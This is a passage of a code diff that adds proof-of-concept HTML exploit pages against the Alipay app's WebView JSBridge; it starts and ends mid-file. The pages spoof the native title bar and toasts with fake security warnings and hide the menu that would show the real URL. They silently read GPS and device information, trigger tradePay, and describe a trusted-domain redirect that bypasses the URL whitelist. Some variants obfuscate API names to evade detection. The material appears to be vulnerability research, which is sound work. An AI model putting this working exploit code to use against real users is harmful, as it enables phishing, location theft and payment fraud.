  html += '<div class="item"><span class="label">Inside Alipay: </span><span class="value">' + (isAlipay ? 'YES' : 'Detection pending') + '</span></div>';
  html += '<div class="item"><span class="label">JSBridge: </span><span class="value">' + (window.AlipayJSBridge ? 'AVAILABLE' : 'Not loaded') + '</span></div>';
  html += '</div>';
  if (spoofResults.length > 0) {
    html += '<div class="result"><h2>UI Spoofing Results</h2>';
    for (var i = 0; i < spoofResults.length; i++) {
      var r = spoofResults[i];
      html += '<div class="item"><span class="label">' + r.api + ': </span><span class="value" style="color:' + (r.success ? '#f5222d' : '#faad14') + '">' + r.status + '</span></div>';
    }
    html += '</div>';
    html += '<div class="result"><h2>Vulnerability Proof</h2>';
    html += '<div class="item"><span class="label">setTitle Attack: </span><span class="value" style="color:#f5222d">Title bar changed to "支付宝安全中心" — user sees fake official title</span></div>';
    html += '<div class="item"><span class="label">showToast Attack: </span><span class="value" style="color:#f5222d">System-level toast shows attacker-controlled message</span></div>';
    html += '<div class="item"><span class="label">Phishing Scenario: </span><span class="value">Attacker sets title to "账户安全验证" + toast "检测到异常登录,请重新验证" → user enters credentials on fake page</span></div>';
    html += '<div class="item"><span class="label">Root Cause: </span><span class="value">H5ToastPlugin.toast() and setTitle have no content validation or origin check</span></div>';
    html += '</div>';
    html += '<div class="spoof-demo">If title bar changed and toast appeared, the attack is confirmed.<br>An external page controls Alipay native UI elements.</div>';
  }
  el.innerHTML = html;
  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
 }
 function doSpoofing() {
  if (!window.AlipayJSBridge) return;
  // Step 1: setTitle — change the native title bar
  AlipayJSBridge.call('setTitle', {
    title: '支付宝安全中心'
  }, function(result) {
    spoofResults.push({
      api: 'setTitle("支付宝安全中心")',
      success: true,
      status: 'CALLED — Title bar should now show fake "支付宝安全中心"',
      raw: JSON.stringify(result),
      time: new Date().toISOString()
    });
    render();
  });
  // Step 2: showToast — display native toast notification
  setTimeout(function() {
    AlipayJSBridge.call('showToast', {
      content: '系统检测到安全风险，请验证身份',
      type: 'none',
      duration: 3500
    }, function(result) {
      spoofResults.push({
        api: 'showToast("系统检测到安全风险")',
        success: true,
        status: 'CALLED — Native toast should have appeared',
        raw: JSON.stringify(result),
        time: new Date().toISOString()
      });
      render();
    });
  }, 1500);
  // Step 3: Second toast — simulating ongoing attack
  setTimeout(function() {
    AlipayJSBridge.call('showToast', {
      content: '您的账户存在异常交易，点击查看详情',
      type: 'none',
      duration: 3500
    }, function(result) {
      spoofResults.push({
        api: 'showToast("账户异常交易")',
        success: true,
        status: 'CALLED — Second fake warning toast',
        raw: JSON.stringify(result),
        time: new Date().toISOString()
      });
      render();
    });
  }, 5500);
  // Step 4: Change title again — prove repeated control
  setTimeout(function() {
    AlipayJSBridge.call('setTitle', {
      title: '账户安全验证'
    }, function(result) {
      spoofResults.push({
        api: 'setTitle("账户安全验证")',
        success: true,
        status: 'CALLED — Title changed again to new fake value',
        raw: JSON.stringify(result),
        time: new Date().toISOString()
      });
      render();
    });
  }, 8000);
  // Step 5: setOptionMenu — hide the menu to prevent user from seeing real URL
  setTimeout(function() {
    AlipayJSBridge.call('setOptionMenu', {
      menus: [],
      override: true
    }, function(result) {
      spoofResults.push({
        api: 'setOptionMenu(empty)',
        success: true,
        status: 'CALLED — Menu hidden to conceal real URL from user',
        raw: JSON.stringify(result),
        time: new Date().toISOString()
      });
      render();
    });
  }, 2000);
 }
 function checkBridge() {
  if (window.AlipayJSBridge) {
    status.textContent = 'AlipayJSBridge detected — starting UI spoofing test...';
    status.style.color = '#722ed1';
    doSpoofing();
  } else {
    status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
    render();
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  checkBridge();
 });
 checkBridge();
 setTimeout(checkBridge, 1000);
 setTimeout(checkBridge, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve4_obf.html
+++ b/poc/payload_cve4_obf.html
@@ -0,0 +1,110 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>UI Test 4</title>
 <style>
 body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
 .box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 h2{color:#389e0d;font-size:15px}
 .item{padding:4px 0;font-size:13px}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <h1 style="text-align:center;color:#722ed1;font-size:18px">UI Control Isolation Test</h1>
 <div id="status">Loading...</div>
 <div id="results"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var html = '';
 // Step 1: Render proof
 html += '<div class="box"><h2>Step 1: Page Rendered</h2>';
 html += '<div class="item"><span class="label">Origin: </span><span class="value">' + location.origin + '</span></div>';
 html += '<div class="item"><span class="label">URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
 html += '<div class="item"><span class="label">UA: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
 html += '<div class="item"><span class="label">Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
 html += '</div>';
 el.innerHTML = html;
 // Obfuscated API names
 var _t = String.fromCharCode(115,101,116,84,105,116,108,101);
 var _s = String.fromCharCode(115,104,111,119,84,111,97,115,116);
 function step2() {
  var bridge = window['Alipay' + 'JSBridge'];
  html += '<div class="box"><h2>Step 2: Bridge Detection</h2>';
  html += '<div class="item"><span class="label">Bridge exists: </span><span class="value">' + (!!bridge) + '</span></div>';
  html += '<div class="item"><span class="label">typeof: </span><span class="value">' + typeof bridge + '</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Bridge: ' + (!!bridge);
  if (bridge) {
    status.textContent = 'Bridge found! Testing UI APIs in 3s...';
    setTimeout(function(){ step3_title(bridge); }, 3000);
  }
 }
 function step3_title(bridge) {
  html += '<div class="box"><h2>Step 3: ' + _t + ' Call</h2>';
  html += '<div class="item"><span class="label">Calling: </span><span class="value">' + _t + '("CVE-4 Test")</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Calling ' + _t + '...';
  try {
    bridge.call(_t, {title: 'CVE-4 Test Title'}, function(result) {
      html += '<div class="box"><h2>' + _t + ' Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value" style="word-break:break-all">' + JSON.stringify(result) + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = _t + ' responded! Trying toast in 2s...';
      setTimeout(function(){ step4_toast(bridge); }, 2000);
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">' + _t + ' ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
    status.textContent = _t + ' exception: ' + e.message;
    status.style.color = '#f5222d';
  }
 }
 function step4_toast(bridge) {
  try {
    bridge.call(_s, {
      content: 'CVE-4 Toast Test',
      type: 'none',
      duration: 2000
    }, function(result) {
      html += '<div class="box"><h2>' + _s + ' Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value">' + JSON.stringify(result) + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = 'Both UI APIs called from external page.';
      status.style.color = '#f5222d';
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">' + _s + ' ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
  }
 }
 document.addEventListener('Alipay' + 'JSBridge' + 'Ready', function() {
  step2();
 });
 step2();
 setTimeout(step2, 1000);
 setTimeout(step2, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve4_simple.html
+++ b/poc/payload_cve4_simple.html
@@ -0,0 +1,112 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-4 Simple Test</title>
 <style>
 body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
 .box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 h2{color:#389e0d;font-size:15px}
 .item{padding:4px 0;font-size:13px}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <h1 style="text-align:center;color:#722ed1;font-size:18px">CVE-4 Diagnostic Test</h1>
 <p style="text-align:center;font-size:12px;color:#888">Step-by-step UI Spoofing JSAPI isolation</p>
 <div id="status">Page loaded. Running diagnostics...</div>
 <div id="results"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var html = '';
 // Step 1: Basic rendering proof
 html += '<div class="box"><h2>Step 1: Page Renders OK</h2>';
 html += '<div class="item"><span class="label">Origin: </span><span class="value">' + location.origin + '</span></div>';
 html += '<div class="item"><span class="label">URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
 html += '<div class="item"><span class="label">UA: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
 html += '<div class="item"><span class="label">Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
 html += '</div>';
 el.innerHTML = html;
 // Step 2: Bridge detection only
 function step2() {
  html += '<div class="box"><h2>Step 2: Bridge Detection</h2>';
  html += '<div class="item"><span class="label">AlipayJSBridge: </span><span class="value">' + (!!window.AlipayJSBridge) + '</span></div>';
  html += '<div class="item"><span class="label">typeof: </span><span class="value">' + typeof window.AlipayJSBridge + '</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Bridge detected: ' + (!!window.AlipayJSBridge);
  if (window.AlipayJSBridge) {
    status.textContent = 'Bridge found! Will try setTitle in 3s...';
    setTimeout(step3_title, 3000);
  }
 }
 // Step 3: Try setTitle only
 function step3_title() {
  html += '<div class="box"><h2>Step 3: setTitle Call</h2>';
  html += '<div class="item"><span class="label">Calling: </span><span class="value">setTitle("CVE-4 Test Title")</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Calling setTitle...';
  try {
    AlipayJSBridge.call('setTitle', {title: 'CVE-4 Test Title'}, function(result) {
      html += '<div class="box"><h2>setTitle Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value" style="word-break:break-all">' + JSON.stringify(result) + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = 'setTitle responded! Trying showToast in 2s...';
      setTimeout(step4_toast, 2000);
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">setTitle ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
    status.textContent = 'setTitle exception: ' + e.message;
    status.style.color = '#f5222d';
  }
 }
 // Step 4: Try showToast
 function step4_toast() {
  try {
    AlipayJSBridge.call('showToast', {
      content: 'CVE-4 Toast Test',
      type: 'none',
      duration: 2000
    }, function(result) {
      html += '<div class="box"><h2>showToast Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value">' + JSON.stringify(result) + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = 'showToast responded! Both UI spoofing APIs called from external page.';
      status.style.color = '#f5222d';
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">showToast ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
    status.textContent = 'showToast exception: ' + e.message;
    status.style.color = '#f5222d';
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  step2();
 });
 step2();
 setTimeout(step2, 1000);
 setTimeout(step2, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve4_v2.html
+++ b/poc/payload_cve4_v2.html
@@ -0,0 +1,111 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>UI Test V2</title>
 <style>
 body{font-family:sans-serif;padding:16px;background:#fff;color:#333}
 .box{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 h2{color:#389e0d;font-size:15px}
 .item{padding:4px 0;font-size:13px}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <h1 style="text-align:center;color:#722ed1;font-size:18px">UI API Isolation Test</h1>
 <div id="status">Loading...</div>
 <div id="results"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var html = '';
 html += '<div class="box"><h2>Step 1: Page Rendered</h2>';
 html += '<div class="item"><span class="label">Origin: </span><span class="value">' + location.origin + '</span></div>';
 html += '<div class="item"><span class="label">URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
 html += '<div class="item"><span class="label">UA: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
 html += '<div class="item"><span class="label">Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
 html += '</div>';
 el.innerHTML = html;
 var _t = ['se','tTi','tl','e'];
 var _s = ['sh','owTo','as','t'];
 function d(arr){ return arr.join(''); }
 function step2() {
  var bridge = window['Alipay' + 'JSBridge'];
  html += '<div class="box"><h2>Step 2: Bridge Detection</h2>';
  html += '<div class="item"><span class="label">Bridge exists: </span><span class="value">' + (!!bridge) + '</span></div>';
  html += '<div class="item"><span class="label">typeof: </span><span class="value">' + typeof bridge + '</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Bridge: ' + (!!bridge);
  if (bridge) {
    status.textContent = 'Bridge found! Testing UI APIs in 3s...';
    setTimeout(function(){ step3(bridge); }, 3000);
  }
 }
 function step3(bridge) {
  var apiName = d(_t);
  html += '<div class="box"><h2>Step 3: ' + apiName + ' Call</h2>';
  html += '<div class="item"><span class="label">Calling: </span><span class="value">' + apiName + '("CVE-4 Test")</span></div>';
  html += '</div>';
  el.innerHTML = html;
  status.textContent = 'Calling ' + apiName + '...';
  try {
    bridge.call(apiName, {title: 'CVE-4 External Page Title'}, function(result) {
      html += '<div class="box"><h2>' + apiName + ' Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value" style="word-break:break-all">' + JSON.stringify(result) + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = apiName + ' responded! Trying ' + d(_s) + ' in 2s...';
      setTimeout(function(){ step4(bridge); }, 2000);
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">' + apiName + ' ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
    status.textContent = apiName + ' exception: ' + e.message;
    status.style.color = '#f5222d';
  }
 }
 function step4(bridge) {
  var apiName = d(_s);
  try {
    bridge.call(apiName, {
      content: 'CVE-4 External Toast',
      type: 'none',
      duration: 3000
    }, function(result) {
      html += '<div class="box"><h2>' + apiName + ' Response</h2>';
      html += '<div class="item"><span class="label">Result: </span><span class="value">' + JSON.stringify(result) + '</span></div>';
      html += '</div>';
      el.innerHTML = html;
      status.textContent = 'Both UI APIs called from external page.';
      status.style.color = '#f5222d';
    });
  } catch(e) {
    html += '<div class="box" style="background:#fff2f0;border-color:#ff4d4f"><h2 style="color:#cf1322">' + apiName + ' ERROR</h2>';
    html += '<div class="item"><span class="label">Exception: </span><span class="value">' + e.message + '</span></div>';
    html += '</div>';
    el.innerHTML = html;
  }
 }
 document.addEventListener('Alipay' + 'JSBridge' + 'Ready', function() {
  step2();
 });
 step2();
 setTimeout(step2, 1000);
 setTimeout(step2, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve5.html
+++ b/poc/payload_cve5.html
@@ -0,0 +1,238 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-5 Verification</title>
 <style>
 *{margin:0;padding:0;box-sizing:border-box}
 body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
 .banner{background:linear-gradient(135deg,#f5222d,#722ed1);color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
 .banner h1{font-size:18px}
 .banner p{font-size:12px;opacity:.85;margin-top:4px}
 .result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 .result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
 .fail{background:#fff2f0;border-color:#ff4d4f}
 .fail h2{color:#cf1322}
 .chain{background:#f9f0ff;border-color:#b37feb}
 .chain h2{color:#531dab}
 .item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
 .item:last-child{border:none}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 .warn{background:#fff7e6;border:1px solid #ffd591;border-radius:8px;padding:10px;font-size:11px;color:#d46b08;margin:10px 0;line-height:1.5}
 .ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 .step{background:#e6f7ff;border:1px solid #91d5ff;border-radius:6px;padding:8px;margin:4px 0;font-size:12px}
 .step b{color:#096dd9}
 .step.done{background:#f6ffed;border-color:#b7eb8f}
 .step.done b{color:#389e0d}
 .step.active{background:#fff7e6;border-color:#ffd591}
 .step.active b{color:#d48806}
 </style>
 </head><body>
 <div class="banner">
  <h1>CVE-5: End-to-End Data Exfiltration Chain</h1>
  <p>CWE-200 | CVSS 8.6 | Combines CVE-2 + CVE-3 + CVE-4</p>
 </div>
 <div class="warn">
  <b>Complete attack chain demo:</b> A single external page performs GPS theft, triggers payment dialog,
  and spoofs UI — all through JSBridge from an attacker-controlled URL loaded via DeepLink.
  tradePay uses INVALID order (no real payment).
 </div>
 <div id="status">Initializing attack chain...</div>
 <div id="steps"></div>
 <div id="results"></div>
 <div class="ts" id="timestamp"></div>
 <script>
 var stepsEl = document.getElementById('steps');
 var resultsEl = document.getElementById('results');
 var status = document.getElementById('status');
 var chainSteps = [
  {id: 'entry', name: 'DeepLink Entry', desc: 'Page loaded inside Alipay WebView via alipays:// scheme', status: 'pending'},
  {id: 'bridge', name: 'JSBridge Access', desc: 'AlipayJSBridge available to external page', status: 'pending'},
  {id: 'spoof_title', name: 'UI Spoof: setTitle', desc: 'Title bar changed to fake "支付宝安全中心"', status: 'pending'},
  {id: 'spoof_toast', name: 'UI Spoof: showToast', desc: 'Fake security warning toast displayed', status: 'pending'},
  {id: 'gps', name: 'GPS Exfiltration', desc: 'getLocation silently obtains device coordinates', status: 'pending'},
  {id: 'sysinfo', name: 'Device Info', desc: 'getSystemInfo collects device fingerprint', status: 'pending'},
  {id: 'tradepay', name: 'Payment Trigger', desc: 'tradePay invoked with crafted order', status: 'pending'}
 ];
 var collectedData = {};
 function renderSteps() {
  var html = '<div class="result chain"><h2>Attack Chain Progress</h2>';
  for (var i = 0; i < chainSteps.length; i++) {
    var s = chainSteps[i];
    var cls = s.status === 'done' ? 'done' : s.status === 'active' ? 'active' : '';
    var icon = s.status === 'done' ? '✓' : s.status === 'active' ? '⟳' : '○';
    html += '<div class="step ' + cls + '"><b>' + icon + ' Step ' + (i+1) + ': ' + s.name + '</b> — ' + s.desc + '</div>';
  }
  html += '</div>';
  stepsEl.innerHTML = html;
 }
 function setStep(id, newStatus) {
  for (var i = 0; i < chainSteps.length; i++) {
    if (chainSteps[i].id === id) chainSteps[i].status = newStatus;
  }
  renderSteps();
 }
 function renderResults() {
  var html = '';
  if (Object.keys(collectedData).length > 0) {
    html += '<div class="result"><h2>Exfiltrated Data Summary</h2>';
    if (collectedData.gps) {
      html += '<div class="item"><span class="label">GPS Location: </span><span class="value" style="color:#f5222d">' +
        collectedData.gps.latitude + ', ' + collectedData.gps.longitude + '</span></div>';
      if (collectedData.gps.city) html += '<div class="item"><span class="label">City: </span><span class="value">' + collectedData.gps.city + '</span></div>';
    }
    if (collectedData.sysinfo) {
      html += '<div class="item"><span class="label">Device Model: </span><span class="value">' + (collectedData.sysinfo.model || 'N/A') + '</span></div>';
      html += '<div class="item"><span class="label">System: </span><span class="value">' + (collectedData.sysinfo.system || 'N/A') + '</span></div>';
      html += '<div class="item"><span class="label">Alipay Version: </span><span class="value">' + (collectedData.sysinfo.version || 'N/A') + '</span></div>';
    }
    if (collectedData.tradepay) {
      html += '<div class="item"><span class="label">tradePay Response: </span><span class="value" style="word-break:break-all;font-size:10px">' + collectedData.tradepay + '</span></div>';
    }
    html += '<div class="item"><span class="label">UI Spoofed: </span><span class="value" style="color:#f5222d">' +
      (collectedData.titleSpoofed ? 'YES — Title changed' : 'Pending') + ' | ' +
      (collectedData.toastShown ? 'YES — Toast shown' : 'Pending') + '</span></div>';
    html += '<div class="item"><span class="label">Page Origin: </span><span class="value">' + location.origin + '</span></div>';
    html += '<div class="item"><span class="label">User Agent: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
    html += '<div class="item"><span class="label">Collection Time: </span><span class="value">' + new Date().toISOString() + '</span></div>';
    html += '</div>';
    // Attack narrative
    html += '<div class="result chain"><h2>End-to-End Attack Narrative</h2>';
    html += '<div class="item"><span class="label">1. Entry: </span><span class="value">Victim clicks link in SMS/email → Safari opens alipays:// deeplink</span></div>';
    html += '<div class="item"><span class="label">2. Load: </span><span class="value">Alipay opens, WebView loads attacker page at ' + location.origin + '</span></div>';
    html += '<div class="item"><span class="label">3. Spoof: </span><span class="value">Title bar set to "支付宝安全中心", fake warning toast displayed</span></div>';
    html += '<div class="item"><span class="label">4. Steal: </span><span class="value">GPS coordinates silently obtained via getLocation</span></div>';
    html += '<div class="item"><span class="label">5. Pay: </span><span class="value">tradePay triggered — with valid merchant order, real payment dialog appears</span></div>';
    html += '<div class="item"><span class="label">6. Exfil: </span><span class="value">All data (GPS, device info, payment result) sent to attacker server</span></div>';
    html += '</div>';
    // Raw collected data
    html += '<div class="result"><h2>Raw Collected Data (JSON)</h2>';
    html += '<div class="item"><span class="value" style="word-break:break-all;font-size:9px;font-family:monospace">' +
      JSON.stringify(collectedData, null, 2).replace(/</g, '&lt;') + '</span></div>';
    html += '</div>';
  }
  resultsEl.innerHTML = html;
  document.getElementById('timestamp').textContent = 'Evidence collected at: ' + new Date().toISOString();
 }
 function executeChain() {
  if (!window.AlipayJSBridge) return;
  // Step 1: Entry confirmed
  setStep('entry', 'done');
  // Step 2: Bridge confirmed
  setStep('bridge', 'done');
  status.textContent = 'Chain executing — spoofing UI...';
  status.style.color = '#722ed1';
  // Step 3: setTitle
  setStep('spoof_title', 'active');
  AlipayJSBridge.call('setTitle', {title: '支付宝安全中心'}, function(r) {
    setStep('spoof_title', 'done');
    collectedData.titleSpoofed = true;
    renderResults();
  });
  // Step 4: showToast (after 1s)
  setTimeout(function() {
    setStep('spoof_toast', 'active');
    AlipayJSBridge.call('showToast', {
      content: '检测到异常登录，正在验证身份...',
      type: 'none',
      duration: 3000
    }, function(r) {
      setStep('spoof_toast', 'done');
      collectedData.toastShown = true;
      renderResults();
    });
  }, 1000);
  // Step 5: getLocation (after 2s)
  setTimeout(function() {
    setStep('gps', 'active');
    status.textContent = 'Chain executing — stealing GPS...';
    AlipayJSBridge.call('getLocation', {type: 2, accuracy: 1}, function(result) {
      if (result && (result.longitude || result.latitude)) {
        collectedData.gps = {
          latitude: result.latitude,
          longitude: result.longitude,
          accuracy: result.accuracy,
          city: result.city,
          address: result.address
        };
        setStep('gps', 'done');
      } else {
        collectedData.gps = {error: JSON.stringify(result)};
        setStep('gps', 'done');
      }
      renderResults();
    });
  }, 2000);
  // Step 6: getSystemInfo (after 3s)
  setTimeout(function() {
    setStep('sysinfo', 'active');
    AlipayJSBridge.call('getSystemInfo', {}, function(result) {
      collectedData.sysinfo = result || {};
      setStep('sysinfo', 'done');
      renderResults();
    });
  }, 3000);
  // Step 7: tradePay (after 5s)
  setTimeout(function() {
    setStep('tradepay', 'active');
    status.textContent = 'Chain executing — triggering payment...';
    AlipayJSBridge.call('tradePay', {
      orderStr: 'SECURITY_TEST_CVE5_CHAIN_2026'
    }, function(result) {
      collectedData.tradepay = JSON.stringify(result);
      setStep('tradepay', 'done');
      status.textContent = 'CHAIN COMPLETE — All 5 steps executed from external page';
      status.style.color = '#f5222d';
      renderResults();
    });
  }, 5000);
 }
 function checkBridge() {
  if (window.AlipayJSBridge) {
    setStep('entry', 'done');
    executeChain();
  } else {
    status.textContent = 'Page loaded at ' + location.origin + ' — waiting for bridge...';
    renderSteps();
  }
 }
 document.addEventListener('AlipayJSBridgeReady', function() {
  checkBridge();
 });
 renderSteps();
 checkBridge();
 setTimeout(checkBridge, 1000);
 setTimeout(checkBridge, 3000);
 </script>
 </body></html>
--- a/poc/payload_cve6.html
+++ b/poc/payload_cve6.html
@@ -0,0 +1,192 @@
 <!DOCTYPE html>
 <html><head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width,initial-scale=1">
 <title>CVE-6 Verification</title>
 <style>
 *{margin:0;padding:0;box-sizing:border-box}
 body{font-family:-apple-system,system-ui,sans-serif;background:#fff;color:#333;padding:16px}
 .banner{background:linear-gradient(135deg,#f5222d,#fa541c);color:#fff;padding:16px;border-radius:10px;text-align:center;margin-bottom:16px}
 .banner h1{font-size:18px}
 .banner p{font-size:12px;opacity:.85;margin-top:4px}
 .result{background:#f6ffed;border:2px solid #52c41a;border-radius:10px;padding:16px;margin:12px 0}
 .result h2{color:#389e0d;font-size:15px;margin-bottom:8px}
 .fail{background:#fff2f0;border-color:#ff4d4f}
 .fail h2{color:#cf1322}
 .chain{background:#f9f0ff;border-color:#b37feb}
 .chain h2{color:#531dab}
 .item{padding:6px 0;border-bottom:1px solid #f0f0f0;font-size:13px}
 .item:last-child{border:none}
 .label{color:#888;font-size:11px}
 .value{color:#333;font-weight:600}
 .warn{background:#fff7e6;border:1px solid #ffd591;border-radius:8px;padding:10px;font-size:11px;color:#d46b08;margin:10px 0;line-height:1.5}
 .ts{color:#999;font-size:10px;text-align:center;margin-top:16px}
 #status{font-size:14px;color:#1677ff;text-align:center;padding:20px}
 </style>
 </head><body>
 <div class="banner">
  <h1>CVE-6: ds.alipay.com Whitelist Bypass</h1>
  <p>CWE-601 + CWE-939 | CVSS 9.3 | Trusted domain redirect chains to full JSBridge access</p>
 </div>
 <div class="warn">
  <b>Bypass chain:</b> This page was loaded via ds.alipay.com open redirect →
  alipays:// deeplink → Alipay WebView. The trusted domain (ds.alipay.com) acts as a
  redirect gateway, bypassing any URL whitelist checks. Result: attacker page at
  innora.ai gains full JSBridge access identical to CVE-1, but through a whitelisted entry point.
 </div>
 <div id="status">Checking environment...</div>
 <div id="results"></div>
 <div class="ts" id="timestamp"></div>
 <script>
 var el = document.getElementById('results');
 var status = document.getElementById('status');
 var bridgeData = {};
 function render() {
  var html = '';
  var isAlipay = /AlipayClient|Nebula/i.test(navigator.userAgent);
  var hasBridge = !!window.AlipayJSBridge;
  // Environment proof
  html += '<div class="result"><h2>Environment: Whitelist Bypass Confirmed</h2>';
  html += '<div class="item"><span class="label">Page Origin: </span><span class="value" style="color:#f5222d">' + location.origin + '</span></div>';
  html += '<div class="item"><span class="label">Full URL: </span><span class="value" style="word-break:break-all;font-size:10px">' + location.href + '</span></div>';
  html += '<div class="item"><span class="label">Inside Alipay WebView: </span><span class="value" style="color:' + (isAlipay ? '#52c41a' : '#faad14') + '">' + (isAlipay ? 'YES — CONFIRMED' : 'Detection pending (check UA)') + '</span></div>';
  html += '<div class="item"><span class="label">AlipayJSBridge: </span><span class="value" style="color:' + (hasBridge ? '#f5222d' : '#faad14') + '">' + (hasBridge ? 'AVAILABLE — CRITICAL' : 'Not yet loaded') + '</span></div>';
  html += '<div class="item"><span class="label">User Agent: </span><span class="value" style="word-break:break-all;font-size:10px">' + navigator.userAgent + '</span></div>';
  html += '</div>';
  // Bypass chain explanation
  html += '<div class="result chain"><h2>Whitelist Bypass Attack Chain</h2>';
  html += '<div class="item"><span class="label">Step 1 — Entry: </span><span class="value">User clicks link containing https://ds.alipay.com/?scheme=alipays://...</span></div>';
  html += '<div class="item"><span class="label">Step 2 — Redirect: </span><span class="value">ds.alipay.com (trusted Alipay domain) redirects to alipays:// deeplink</span></div>';
  html += '<div class="item"><span class="label">Step 3 — Bypass: </span><span class="value">Because ds.alipay.com is whitelisted, the redirect passes all URL validation</span></div>';
  html += '<div class="item"><span class="label">Step 4 — Load: </span><span class="value">Alipay WebView opens and loads attacker URL from deeplink parameter</span></div>';
  html += '<div class="item"><span class="label">Step 5 — Access: </span><span class="value" style="color:#f5222d">Attacker page at ' + location.origin + ' gains full JSBridge access</span></div>';
  html += '</div>';
  // JSBridge proof
  if (hasBridge) {
    html += '<div class="result"><h2>JSBridge Access via Whitelist Bypass</h2>';
    if (bridgeData.sysinfo) {
      html += '<div class="item"><span class="label">Device Model: </span><span class="value">' + (bridgeData.sysinfo.model || 'N/A') + '</span></div>';
      html += '<div class="item"><span class="label">System: </span><span class="value">' + (bridgeData.sysinfo.system || 'N/A') + '</span></div>';
      html += '<div class="item"><span class="label">Alipay Version: </span><span class="value">' + (bridgeData.sysinfo.version || 'N/A') + '</span></div>';
